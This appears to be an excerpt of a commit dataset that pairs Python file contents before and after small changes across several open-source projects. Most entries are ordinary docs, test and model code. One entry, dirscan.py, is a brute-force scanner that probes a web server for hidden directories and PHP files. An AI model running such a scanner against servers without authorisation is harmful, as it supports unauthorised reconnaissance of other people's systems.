commit stringlengths 40 40 | subject stringlengths 4 1.73k | repos stringlengths 5 127k | old_file stringlengths 2 751 | new_file stringlengths 2 751 | new_contents stringlengths 1 8.98k | old_contents stringlengths 0 6.59k | license stringclasses 13
values | lang stringclasses 23
values |
|---|---|---|---|---|---|---|---|---|
986bb7f8bbbb03d44905406f3ccf4373341cbb38 | Allow render_docs to be called as a shell script | moijes12/oh-mainline,nirmeshk/oh-mainline,SnappleCap/oh-mainline,eeshangarg/oh-mainline,SnappleCap/oh-mainline,campbe13/openhatch,SnappleCap/oh-mainline,heeraj123/oh-mainline,waseem18/oh-mainline,eeshangarg/oh-mainline,eeshangarg/oh-mainline,Changaco/oh-mainline,waseem18/oh-mainline,nirmeshk/oh-mainline,nirmeshk/oh-mainline,vipul-sharma20/oh-mainline,ojengwa/oh-mainline,vipul-sharma20/oh-mainline,sudheesh001/oh-mainline,ehashman/oh-mainline,Changaco/oh-mainline,vipul-sharma20/oh-mainline,ojengwa/oh-mainline,openhatch/oh-mainline,nirmeshk/oh-mainline,sudheesh001/oh-mainline,moijes12/oh-mainline,ojengwa/oh-mainline,onceuponatimeforever/oh-mainline,moijes12/oh-mainline,ojengwa/oh-mainline,moijes12/oh-mainline,onceuponatimeforever/oh-mainline,waseem18/oh-mainline,moijes12/oh-mainline,willingc/oh-mainline,willingc/oh-mainline,willingc/oh-mainline,SnappleCap/oh-mainline,openhatch/oh-mainline,sudheesh001/oh-mainline,openhatch/oh-mainline,SnappleCap/oh-mainline,openhatch/oh-mainline,sudheesh001/oh-mainline,ehashman/oh-mainline,Changaco/oh-mainline,onceuponatimeforever/oh-mainline,ehashman/oh-mainline,eeshangarg/oh-mainline,onceuponatimeforever/oh-mainline,onceuponatimeforever/oh-mainline,eeshangarg/oh-mainline,heeraj123/oh-mainline,openhatch/oh-mainline,sudheesh001/oh-mainline,willingc/oh-mainline,campbe13/openhatch,heeraj123/oh-mainline,vipul-sharma20/oh-mainline,vipul-sharma20/oh-mainline,campbe13/openhatch,willingc/oh-mainline,heeraj123/oh-mainline,ojengwa/oh-mainline,campbe13/openhatch,waseem18/oh-mainline,Changaco/oh-mainline,nirmeshk/oh-mainline,ehashman/oh-mainline,campbe13/openhatch,Changaco/oh-mainline,ehashman/oh-mainline,waseem18/oh-mainline,heeraj123/oh-mainline | tools/render_docs.py | tools/render_docs.py | #!/usr/bin/env python
"""Generate html documentation"""
__requires__ = 'Sphinx>=1.1.2'
import sys,os,re
from pkg_resources import load_entry_point
# Allow this script to find its doc config resource
docs_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),'../docs')
sys.path.insert(0,docs_path)
import conf
def main(argv=None):
if argv:
sys.argv = argv
# Generate documentation
return load_entry_point(__requires__, 'console_scripts',
'sphinx-build')()
if __name__ == "__main__":
# generate rendered html on the docs/html directory.
os.chdir(docs_path)
sys.exit(main(['render_docs.py','-b','html','-d','_temp','.','html']))
| """Generate html documentation"""
__requires__ = 'Sphinx>=1.1.2'
import sys,os,re
from pkg_resources import load_entry_point
# Allow this script to find its doc config resource
docs_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),'../docs')
sys.path.insert(0,docs_path)
import conf
def main(argv=None):
if argv:
sys.argv = argv
# Generate documentation
return load_entry_point(__requires__, 'console_scripts',
'sphinx-build')()
if __name__ == "__main__":
# generate rendered html on the docs/html directory.
os.chdir(docs_path)
sys.exit(main(['generate_docs.py','-b','html','-d','_temp','.','html']))
| agpl-3.0 | Python |
574dac56e8e2d34c5d9b8d4f76917921809b4382 | add / to path to scan | bl4de/security-tools,bl4de/security-tools,bl4de/security-tools,bl4de/security-tools,bl4de/security-tools | dirscan.py | dirscan.py | #!/usr/bin/python
#
# webserver dir bruteforce scanner
#
import sys
import urllib
def scan_directory(__url, __directory):
print __url + __directory
resp = urllib.urlopen(__url + __directory)
print resp.code
if resp.code == 200:
print '\33[33m' + __url + __directory + '\33[0m'
return True
else:
return False
def scan_file(__url):
resp = urllib.urlopen(__url)
# print resp.code
if resp.code == 200:
print '\33[33m' + __url + '\33[0m'
return True
else:
return False
def scan_files(__url, __directory, __wordlist):
# print _step
for _filename in __wordlist:
_url = __url + __directory + '/' + _filename + '.php'
_found = scan_file(_url)
def scan(__server, __port, __path, __wordlist):
if len(__wordlist) > 0:
_counter = 1
_totalWordList = len(__wordlist)
# 1/10 of progress indicator
_step = int(_totalWordList / 10)
if _step == 0:
_step = 1
print "\33[36m Start scan with %d known names.\n\33[0m" % _totalWordList
# print _step
for _directory in __wordlist:
if _counter % _step == 0:
print "\33[32m scanned %d of %d so far, continue...\33[0m" % ( _counter, len(__wordlist))
_url = __server + ':' + __port + '/' + __path + '/'
_found = scan_directory(_url, _directory)
if _found:
# scan for files using the same wordlist
scan_files(_url, _directory, __wordlist)
_counter += 1
print "\33[36mDone.\n\33[0m"
# main program
if __name__ == "__main__":
server = sys.argv[1]
port = sys.argv[2]
path = sys.argv[3]
if len(sys.argv) > 4:
wordlistFile = sys.argv[4]
wordlistFileHandler = open(wordlistFile, 'r')
wordlist = wordlistFileHandler.readlines()
else:
wordlist = []
scan(server, port, path, wordlist)
| #!/usr/bin/python
#
# webserver dir bruteforce scanner
#
import sys
import urllib
def scan_directory(__url, __directory):
print __url + __directory
resp = urllib.urlopen(__url + __directory)
print resp.code
if resp.code == 200:
print '\33[33m' + __url + __directory + '\33[0m'
return True
else:
return False
def scan_file(__url):
resp = urllib.urlopen(__url)
# print resp.code
if resp.code == 200:
print '\33[33m' + __url + '\33[0m'
return True
else:
return False
def scan_files(__url, __directory, __wordlist):
# print _step
for _filename in __wordlist:
_url = __url + __directory + '/' + _filename + '.php'
_found = scan_file(_url)
def scan(__server, __port, __path, __wordlist):
if len(__wordlist) > 0:
_counter = 1
_totalWordList = len(__wordlist)
# 1/10 of progress indicator
_step = int(_totalWordList / 10)
if _step == 0:
_step = 1
print "\33[36m Start scan with %d known names.\n\33[0m" % _totalWordList
# print _step
for _directory in __wordlist:
if _counter % _step == 0:
print "\33[32m scanned %d of %d so far, continue...\33[0m" % ( _counter, len(__wordlist))
_url = __server + ':' + __port + __path
_found = scan_directory(_url, _directory)
if _found:
# scan for files using the same wordlist
scan_files(_url, _directory, __wordlist)
_counter += 1
print "\33[36mDone.\n\33[0m"
# main program
if __name__ == "__main__":
server = sys.argv[1]
port = sys.argv[2]
path = sys.argv[3]
if len(sys.argv) > 4:
wordlistFile = sys.argv[4]
wordlistFileHandler = open(wordlistFile, 'r')
wordlist = wordlistFileHandler.readlines()
else:
wordlist = []
scan(server, port, path, wordlist)
| mit | Python |
14a2e983502c4c36ba29307d8a67a6286960d8bb | set path and gdal_data env in wpstestclient | sradanov/flyingpigeon,KatiRG/flyingpigeon,KatiRG/flyingpigeon,sradanov/flyingpigeon,bird-house/flyingpigeon,sradanov/flyingpigeon,KatiRG/flyingpigeon,KatiRG/flyingpigeon,KatiRG/flyingpigeon,sradanov/flyingpigeon,sradanov/flyingpigeon | tests/common.py | tests/common.py | import os
import pywps
import lxml
NAMESPACES = {
'xlink': "http://www.w3.org/1999/xlink",
'wps': "http://www.opengis.net/wps/1.0.0",
'ows': "http://www.opengis.net/ows/1.1",
'gml': "http://www.opengis.net/gml",
'xsi': "http://www.w3.org/2001/XMLSchema-instance"
}
SERVICE = "http://localhost:8093/wps"
TESTDATA = {
'noaa_nc_1': "http://www.esrl.noaa.gov/psd/thredds/fileServer/Datasets/ncep.reanalysis.dailyavgs/surface/slp.1955.nc",
'noaa_catalog_1': "http://www.esrl.noaa.gov/psd/thredds/catalog/Datasets/ncep.reanalysis.dailyavgs/surface/catalog.xml?dataset=Datasets/ncep.reanalysis.dailyavgs/surface/air.sig995.1948.nc"
}
class WpsTestClient(object):
def __init__(self):
pywps_path = os.path.dirname(pywps.__file__)
home_path = os.path.abspath(os.path.join(pywps_path, '..', '..', '..', '..'))
os.environ['PYWPS_CFG'] = os.path.join(home_path, 'etc', 'pywps', 'flyingpigeon.cfg')
os.environ['REQUEST_METHOD'] = pywps.METHOD_GET
os.environ['PATH'] = "{0}:{1}".format(os.path.join(home_path, 'bin'), os.environ['PATH'])
os.environ['GDAL_DATA'] = os.path.join(home_path, 'share', 'gdal')
self.wps = pywps.Pywps(os.environ)
def get(self, *args, **kwargs):
query = ""
for key,value in kwargs.iteritems():
query += "{0}={1}&".format(key, value)
inputs = self.wps.parseRequest(query)
self.wps.performRequest(inputs)
return WpsTestResponse(self.wps.response)
class WpsTestResponse(object):
def __init__(self, data):
self.data = data
self.xml = lxml.etree.fromstring(data)
def xpath(self, path):
return self.xml.xpath(path, namespaces=NAMESPACES)
def xpath_text(self, path):
return ' '.join(e.text for e in self.xpath(path))
def assert_response_success(resp):
success = resp.xpath('/wps:ExecuteResponse/wps:Status/wps:ProcessSucceeded')
assert len(success) == 1
| import os
import pywps
import lxml
NAMESPACES = {
'xlink': "http://www.w3.org/1999/xlink",
'wps': "http://www.opengis.net/wps/1.0.0",
'ows': "http://www.opengis.net/ows/1.1",
'gml': "http://www.opengis.net/gml",
'xsi': "http://www.w3.org/2001/XMLSchema-instance"
}
SERVICE = "http://localhost:8093/wps"
TESTDATA = {
'noaa_nc_1': "http://www.esrl.noaa.gov/psd/thredds/fileServer/Datasets/ncep.reanalysis.dailyavgs/surface/slp.1955.nc",
'noaa_catalog_1': "http://www.esrl.noaa.gov/psd/thredds/catalog/Datasets/ncep.reanalysis.dailyavgs/surface/catalog.xml?dataset=Datasets/ncep.reanalysis.dailyavgs/surface/air.sig995.1948.nc"
}
class WpsTestClient(object):
def __init__(self):
pywps_path = os.path.dirname(pywps.__file__)
os.environ['PYWPS_CFG'] = os.path.abspath(os.path.join(pywps_path, '..', '..', '..', '..', 'etc', 'pywps', 'flyingpigeon.cfg'))
os.environ['REQUEST_METHOD'] = pywps.METHOD_GET
self.wps = pywps.Pywps(os.environ)
def get(self, *args, **kwargs):
query = ""
for key,value in kwargs.iteritems():
query += "{0}={1}&".format(key, value)
inputs = self.wps.parseRequest(query)
self.wps.performRequest(inputs)
return WpsTestResponse(self.wps.response)
class WpsTestResponse(object):
def __init__(self, data):
self.data = data
self.xml = lxml.etree.fromstring(data)
def xpath(self, path):
return self.xml.xpath(path, namespaces=NAMESPACES)
def xpath_text(self, path):
return ' '.join(e.text for e in self.xpath(path))
def assert_response_success(resp):
success = resp.xpath('/wps:ExecuteResponse/wps:Status/wps:ProcessSucceeded')
assert len(success) == 1
| apache-2.0 | Python |
52f8d82b2c8aa165a06e71122eccfaee19fde277 | Fix a missing import | MarcMeszaros/envitro | tests/docker.py | tests/docker.py | # -*- coding: utf-8 -*-
"""Unit tests for the envitro module."""
import os
import unittest
import envitro
import envitro.docker
class TestDocker(unittest.TestCase):
def test_protocol(self):
envitro.set('DB_PORT', 'tcp://172.17.0.82:5432')
self.assertEqual(envitro.docker.protocol('DB'), 'tcp')
def test_protocol_required(self):
if envitro.isset('DB_REQUIRED_PORT'):
del os.environ['DB_REQUIRED_PORT']
with self.assertRaises(KeyError):
envitro.docker.protocol('DB_REQUIRED_PORT')
def test_protocol_default(self):
if envitro.isset('DB_DEFAULT_PORT'):
del os.environ['DB_DEFAULT_PORT']
self.assertEqual(envitro.docker.protocol('DB_DEFAULT', 'udp'), 'udp')
def test_host(self):
envitro.set('DB_PORT', 'tcp://172.17.0.82:5432')
self.assertEqual(envitro.docker.host('DB'), '172.17.0.82')
def test_host_required(self):
if envitro.isset('DB_REQUIRED_PORT'):
del os.environ['DB_REQUIRED_PORT']
with self.assertRaises(KeyError):
envitro.docker.host('DB_REQUIRED_PORT')
def test_host_default(self):
if envitro.isset('DB_DEFAULT_PORT'):
del os.environ['DB_DEFAULT_PORT']
self.assertEqual(envitro.docker.host('DB_DEFAULT', 'localhost'), 'localhost')
def test_port(self):
envitro.set('DB_PORT', 'tcp://172.17.0.82:5432')
self.assertEqual(envitro.docker.port('DB'), 5432)
def test_port_required(self):
if envitro.isset('DB_REQUIRED_PORT'):
del os.environ['DB_REQUIRED_PORT']
with self.assertRaises(KeyError):
envitro.docker.port('DB_REQUIRED_PORT')
def test_port_default(self):
if envitro.isset('DB_DEFAULT_PORT'):
del os.environ['DB_DEFAULT_PORT']
self.assertEqual(envitro.docker.port('DB_DEFAULT', 1234), 1234)
| # -*- coding: utf-8 -*-
"""Unit tests for the envitro module."""
import unittest
import envitro
import envitro.docker
class TestDocker(unittest.TestCase):
def test_protocol(self):
envitro.set('DB_PORT', 'tcp://172.17.0.82:5432')
self.assertEqual(envitro.docker.protocol('DB'), 'tcp')
def test_protocol_required(self):
if envitro.isset('DB_REQUIRED_PORT'):
del os.environ['DB_REQUIRED_PORT']
with self.assertRaises(KeyError):
envitro.docker.protocol('DB_REQUIRED_PORT')
def test_protocol_default(self):
if envitro.isset('DB_DEFAULT_PORT'):
del os.environ['DB_DEFAULT_PORT']
self.assertEqual(envitro.docker.protocol('DB_DEFAULT', 'udp'), 'udp')
def test_host(self):
envitro.set('DB_PORT', 'tcp://172.17.0.82:5432')
self.assertEqual(envitro.docker.host('DB'), '172.17.0.82')
def test_host_required(self):
if envitro.isset('DB_REQUIRED_PORT'):
del os.environ['DB_REQUIRED_PORT']
with self.assertRaises(KeyError):
envitro.docker.host('DB_REQUIRED_PORT')
def test_host_default(self):
if envitro.isset('DB_DEFAULT_PORT'):
del os.environ['DB_DEFAULT_PORT']
self.assertEqual(envitro.docker.host('DB_DEFAULT', 'localhost'), 'localhost')
def test_port(self):
envitro.set('DB_PORT', 'tcp://172.17.0.82:5432')
self.assertEqual(envitro.docker.port('DB'), 5432)
def test_port_required(self):
if envitro.isset('DB_REQUIRED_PORT'):
del os.environ['DB_REQUIRED_PORT']
with self.assertRaises(KeyError):
envitro.docker.port('DB_REQUIRED_PORT')
def test_port_default(self):
if envitro.isset('DB_DEFAULT_PORT'):
del os.environ['DB_DEFAULT_PORT']
self.assertEqual(envitro.docker.port('DB_DEFAULT', 1234), 1234)
| apache-2.0 | Python |
ed4a868443364839806694c5885cd1986363fb16 | fix undefined variables in Log.__str__ | wagtail/django-modelcluster,theju/django-modelcluster,thenewguy/django-modelcluster,torchbox/django-modelcluster | tests/models.py | tests/models.py | from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from modelcluster.tags import ClusterTaggableManager
from taggit.models import TaggedItemBase
from modelcluster.fields import ParentalKey
from modelcluster.models import ClusterableModel
@python_2_unicode_compatible
class Band(ClusterableModel):
name = models.CharField(max_length=255)
def __str__(self):
return self.name
@python_2_unicode_compatible
class BandMember(models.Model):
band = ParentalKey('Band', related_name='members')
name = models.CharField(max_length=255)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Album(models.Model):
band = ParentalKey('Band', related_name='albums')
name = models.CharField(max_length=255)
release_date = models.DateField(null=True, blank=True)
sort_order = models.IntegerField(null=True, blank=True, editable=False)
sort_order_field = 'sort_order'
def __str__(self):
return self.name
class Meta:
ordering = ['sort_order']
class TaggedPlace(TaggedItemBase):
content_object = ParentalKey('Place', related_name='tagged_items')
@python_2_unicode_compatible
class Place(ClusterableModel):
name = models.CharField(max_length=255)
tags = ClusterTaggableManager(through=TaggedPlace)
def __str__(self):
return self.name
class Restaurant(Place):
serves_hot_dogs = models.BooleanField()
proprietor = models.ForeignKey('Chef', null=True, blank=True, on_delete=models.SET_NULL, related_name='restaurants')
@python_2_unicode_compatible
class Dish(models.Model):
name = models.CharField(max_length=255)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Wine(models.Model):
name = models.CharField(max_length=255)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Chef(models.Model):
name = models.CharField(max_length=255)
def __str__(self):
return self.name
@python_2_unicode_compatible
class MenuItem(models.Model):
restaurant = ParentalKey('Restaurant', related_name='menu_items')
dish = models.ForeignKey('Dish', related_name='+')
price = models.DecimalField(max_digits=6, decimal_places=2)
recommended_wine = models.ForeignKey('Wine', null=True, blank=True, on_delete=models.SET_NULL, related_name='+')
def __str__(self):
return "%s - %f" % (self.dish, self.price)
@python_2_unicode_compatible
class Log(ClusterableModel):
time = models.DateTimeField()
data = models.CharField(max_length=255)
def __str__(self):
return "[%s] %s" % (self.time.isoformat(), self.data)
| from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from modelcluster.tags import ClusterTaggableManager
from taggit.models import TaggedItemBase
from modelcluster.fields import ParentalKey
from modelcluster.models import ClusterableModel
@python_2_unicode_compatible
class Band(ClusterableModel):
name = models.CharField(max_length=255)
def __str__(self):
return self.name
@python_2_unicode_compatible
class BandMember(models.Model):
band = ParentalKey('Band', related_name='members')
name = models.CharField(max_length=255)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Album(models.Model):
band = ParentalKey('Band', related_name='albums')
name = models.CharField(max_length=255)
release_date = models.DateField(null=True, blank=True)
sort_order = models.IntegerField(null=True, blank=True, editable=False)
sort_order_field = 'sort_order'
def __str__(self):
return self.name
class Meta:
ordering = ['sort_order']
class TaggedPlace(TaggedItemBase):
content_object = ParentalKey('Place', related_name='tagged_items')
@python_2_unicode_compatible
class Place(ClusterableModel):
name = models.CharField(max_length=255)
tags = ClusterTaggableManager(through=TaggedPlace)
def __str__(self):
return self.name
class Restaurant(Place):
serves_hot_dogs = models.BooleanField()
proprietor = models.ForeignKey('Chef', null=True, blank=True, on_delete=models.SET_NULL, related_name='restaurants')
@python_2_unicode_compatible
class Dish(models.Model):
name = models.CharField(max_length=255)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Wine(models.Model):
name = models.CharField(max_length=255)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Chef(models.Model):
name = models.CharField(max_length=255)
def __str__(self):
return self.name
@python_2_unicode_compatible
class MenuItem(models.Model):
restaurant = ParentalKey('Restaurant', related_name='menu_items')
dish = models.ForeignKey('Dish', related_name='+')
price = models.DecimalField(max_digits=6, decimal_places=2)
recommended_wine = models.ForeignKey('Wine', null=True, blank=True, on_delete=models.SET_NULL, related_name='+')
def __str__(self):
return "%s - %f" % (self.dish, self.price)
@python_2_unicode_compatible
class Log(ClusterableModel):
time = models.DateTimeField()
data = models.CharField(max_length=255)
def __str__(self):
return "[%s] %s" % (time.isoformat(), data)
| bsd-3-clause | Python |
7095980badfca611a1adfc8b57a7df08a3c603c6 | add some doc and comments | thefab/tornadis,thefab/tornadis | tornadis/pipeline.py | tornadis/pipeline.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of tornadis library released under the MIT license.
# See the LICENSE file for more information.
class Pipeline(object):
"""Pipeline class to stack redis commands.
A pipeline object is just a kind of stack. You stack complete redis
commands (with their corresponding arguments) inside it.
Then, you use the call() method of a Client object to process the pipeline
(which must be the only argument of this call() call).
More informations on the redis side: http://redis.io/topics/pipelining
Attributes:
pipelined_args: A list of tuples, earch tuple is a complete
redis command
number_of_stacked_calls: the number of stacked redis commands (integer)
"""
def __init__(self):
"""Simple constructor."""
self.pipelined_args = []
self.number_of_stacked_calls = 0
def stack_call(self, *args):
"""Stacks a redis command inside the object.
The syntax is the same than the call() method a Client class
Examples:
>>> pipeline = Pipeline()
>>> pipeline.stack_call("HSET", "key", "field", "value")
>>> pipeline.stack_call("PING")
>>> pipeline.stack_call("INCR", "key2")
Attributes:
*args: full redis command as variable length argument list
"""
self.pipelined_args.append(args)
self.number_of_stacked_calls = self.number_of_stacked_calls + 1
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of tornadis library released under the MIT license.
# See the LICENSE file for more information.
class Pipeline(object):
pipelined_args = None
number_of_stacked_calls = None
def __init__(self):
self.pipelined_args = []
self.number_of_stacked_calls = 0
def stack_call(self, *args):
self.pipelined_args.append(args)
self.number_of_stacked_calls = self.number_of_stacked_calls + 1
| mit | Python |
2b3e1aaab1a2aca3599026c65f0acc9a4c83065a | Remove unused import. | laurentguilbert/django-trampoline,simion/django-trampoline | trampoline/mixins.py | trampoline/mixins.py | """
Mixins for trampoline.
"""
from django.contrib.contenttypes.models import ContentType
from trampoline import get_trampoline_config
from trampoline.tasks import es_delete_doc
from trampoline.tasks import es_index_object
trampoline_config = get_trampoline_config()
class ESIndexableMixin(object):
"""
Provide the required methods and attributes to index django models.
"""
es_doc_type = None
@classmethod
def get_indexable_queryset(cls): # pragma: no cover
return cls.objects.all()
@classmethod
def get_es_doc_type(cls): # pragma: no cover
return cls.es_doc_type
def is_indexable(self):
return True
def get_es_doc_mapping(self):
raise NotImplementedError
def get_es_doc(self):
if not self.pk:
return None
doc_type = self.get_es_doc_type()
index_name = doc_type._doc_type.index
doc = doc_type.get(index=index_name, id=self.pk, ignore=404)
return doc
def es_index(self, async=True, countdown=0, index_name=None):
if trampoline_config.is_disabled:
return
doc_type = self.get_es_doc_type()
index_name = index_name or doc_type._doc_type.index
content_type = ContentType.objects.get_for_model(self)
if async:
es_index_object.apply_async(
(index_name, content_type.pk, self.pk),
countdown=countdown
)
else:
es_index_object.apply((index_name, content_type.pk, self.pk))
def es_delete(self, async=True, index_name=None):
if trampoline_config.is_disabled:
return
doc_type = self.get_es_doc_type()
doc_type_name = doc_type._doc_type.name
index_name = index_name or doc_type._doc_type.index
if async:
es_delete_doc.delay(index_name, doc_type_name, self.pk)
else:
es_delete_doc.apply((index_name, doc_type_name, self.pk))
| """
Mixins for trampoline.
"""
from django.contrib.contenttypes.models import ContentType
from elasticsearch.exceptions import NotFoundError
from trampoline import get_trampoline_config
from trampoline.tasks import es_delete_doc
from trampoline.tasks import es_index_object
trampoline_config = get_trampoline_config()
class ESIndexableMixin(object):
"""
Provide the required methods and attributes to index django models.
"""
es_doc_type = None
@classmethod
def get_indexable_queryset(cls): # pragma: no cover
return cls.objects.all()
@classmethod
def get_es_doc_type(cls): # pragma: no cover
return cls.es_doc_type
def is_indexable(self):
return True
def get_es_doc_mapping(self):
raise NotImplementedError
def get_es_doc(self):
if not self.pk:
return None
doc_type = self.get_es_doc_type()
index_name = doc_type._doc_type.index
doc = doc_type.get(index=index_name, id=self.pk, ignore=404)
return doc
def es_index(self, async=True, countdown=0, index_name=None):
if trampoline_config.is_disabled:
return
doc_type = self.get_es_doc_type()
index_name = index_name or doc_type._doc_type.index
content_type = ContentType.objects.get_for_model(self)
if async:
es_index_object.apply_async(
(index_name, content_type.pk, self.pk),
countdown=countdown
)
else:
es_index_object.apply((index_name, content_type.pk, self.pk))
def es_delete(self, async=True, index_name=None):
if trampoline_config.is_disabled:
return
doc_type = self.get_es_doc_type()
doc_type_name = doc_type._doc_type.name
index_name = index_name or doc_type._doc_type.index
if async:
es_delete_doc.delay(index_name, doc_type_name, self.pk)
else:
es_delete_doc.apply((index_name, doc_type_name, self.pk))
| mit | Python |
769195c58b147ecafb6e595612f29e376075c131 | Update treetime/__init__.py | neherlab/treetime,neherlab/treetime | treetime/__init__.py | treetime/__init__.py | version="0.9.2"
## Here we define an error class for TreeTime errors, MissingData, UnknownMethod and NotReady errors
## are all due to incorrect calling of TreeTime functions or input data that does not fit our base assumptions.
## Errors marked as TreeTimeOtherErrors might be due to data not fulfilling base assumptions or due
## to bugs in TreeTime. Please report them to the developers if they persist.
class TreeTimeError(Exception):
"""
TreeTimeError class
Parent class for more specific errors
Raised when treetime is used incorrectly in contrast with `TreeTimeOtherError`
`TreeTimeOtherError` is raised when the reason of the error is unknown, could indicate bug
"""
pass
class MissingDataError(TreeTimeError):
"""MissingDataError class raised when tree or alignment are missing"""
pass
class UnknownMethodError(TreeTimeError):
"""MissingDataError class raised when an unknown method is called"""
pass
class NotReadyError(TreeTimeError):
"""NotReadyError class raised when results are requested before inference"""
pass
class TreeTimeOtherError(TreeTimeError):
"""TreeTimeOtherError class raised when TreeTime fails during inference due to an unknown reason. This might be due to data not fulfilling base assumptions or due to bugs in TreeTime. Please report them to the developers if they persist."""
pass
from .treeanc import TreeAnc
from .treetime import TreeTime, plot_vs_years
from .clock_tree import ClockTree
from .treetime import ttconf as treetime_conf
from .gtr import GTR
from .gtr_site_specific import GTR_site_specific
from .merger_models import Coalescent
from .treeregression import TreeRegression
from .argument_parser import make_parser
| version="0.9.2"
## Here we define an error class for TreeTime errors, MissingData, UnknownMethod and NotReady errors
## are all due to incorrect calling of TreeTime functions or input data that does not fit our base assumptions.
## Errors marked as TreeTimeOtherErrors might be due to data not fulfilling base assumptions or due
## to bugs in TreeTime. Please report them to the developers if they persist.
class TreeTimeError(Exception):
"""TreeTimeError class"""
pass
class MissingDataError(TreeTimeError):
"""MissingDataError class raised when tree or alignment are missing"""
pass
class UnknownMethodError(TreeTimeError):
"""MissingDataError class raised when an unknown method is called"""
pass
class NotReadyError(TreeTimeError):
"""NotReadyError class raised when results are requested before inference"""
pass
class TreeTimeOtherError(TreeTimeError):
"""TreeTimeOtherError class raised when TreeTime fails during inference due to an unknown reason. This might be due to data not fulfilling base assumptions or due to bugs in TreeTime. Please report them to the developers if they persist."""
pass
from .treeanc import TreeAnc
from .treetime import TreeTime, plot_vs_years
from .clock_tree import ClockTree
from .treetime import ttconf as treetime_conf
from .gtr import GTR
from .gtr_site_specific import GTR_site_specific
from .merger_models import Coalescent
from .treeregression import TreeRegression
from .argument_parser import make_parser
| mit | Python |
cd513ee5fcbbd139ca1a3601df0bd6fd7d81e453 | add BoardSchema, BoardDetailsSchema and add refactor TaskSchema to include `number` field and status validation | kokimoribe/todo-api | todo/schemas.py | todo/schemas.py | """Request/Response Schemas are defined here"""
# pylint: disable=invalid-name
from marshmallow import Schema, fields, validate
from todo.constants import TO_DO, IN_PROGRESS, DONE
class TaskSchema(Schema):
"""Schema for serializing an instance of Task"""
id = fields.Int(required=True)
title = fields.Str(required=True)
description = fields.Str(required=True)
status = fields.Str(
required=True,
validate=validate.OneOf(
choices=[TO_DO, IN_PROGRESS, DONE],
error="Status must be one of {choices} (given: {input})"))
number = fields.Int(required=True)
created_at = fields.DateTime(required=True)
updated_at = fields.DateTime(required=True)
class BoardSchema(Schema):
"""Schema for serializing an instance of Board"""
id = fields.Int(required=True)
name = fields.Str(required=True)
created_at = fields.DateTime(required=True)
updated_at = fields.DateTime(required=True)
class BoardDetailsSchema(BoardSchema):
"""Schema for serializing an instance of Board and its tasks"""
tasks = fields.Nested(TaskSchema, many=True)
| """Request/Response Schemas are defined here"""
# pylint: disable=invalid-name
from marshmallow import Schema, fields
class TaskSchema(Schema):
"""Schema for api.portal.models.Panel"""
id = fields.Int(required=True)
title = fields.Str(required=True)
description = fields.Str(required=True)
status = fields.Str(required=True)
created_at = fields.DateTime(required=True)
updated_at = fields.DateTime(required=True)
| mit | Python |
fa56b8a5e9b5c32726281081062a45adcd8e7ffb | Update mcmc.py | RonsenbergVI/trendpy,RonsenbergVI/trendpy | trendpy/mcmc.py | trendpy/mcmc.py | # -*- coding: utf-8 -*-
# mcmc.py
# MIT License
# Copyright (c) 2017 Rene Jean Corneille
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from numpy import reshape, zeros
class MCMC(object):
def __init__(self, data, strategy):
self.data = data
self.strategy = strategy
self.simulations = None
def summary(self):
smry = ""
return smry
def define_parameters(self):
return self.strategy.define_parameters()
def initial_value(self,parameter_name):
return self.strategy.initial_value(parameter_name)
def distribution_parameters(self, parameter_name):
return self.strategy.distribution_parameters(parameter_name) # returns a dictionary
def generate(self, parameter_name):
return self.strategy.generate(parameter_name)
def output(self, burn, parameter_name):
return self.strategy.output(self.simulations, burn, parameter_name)
def run(self, number_simulations=100):
self.simulations = {key : zeros((param.size[0],param.size[1],number_simulations)) for (key, param) in self.strategy.parameters.list.items()}
for name in self.strategy.parameters.hierarchy:
self.strategy.parameters.list[name].current_value = self.initial_value(name)
for i in range(number_simulations):
print("== step %i ==" % (int(i+1),))
#restart_step = True
#while restart_step:
for name in self.strategy.parameters.hierarchy:
print("== parameter %s ==" % name)
#try:
self.strategy.parameters.list[name].current_value = self.generate(name)
self.simulations[name][:,:,i] = self.strategy.parameters.list[name].current_value.reshape(self.strategy.parameters.list[name].size)
#restart_step = False
#except:
# print("== restart step %i ==" % i)
# restart_step = True
# break
| # mcmc.py
# MIT License
# Copyright (c) 2017 Rene Jean Corneille
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
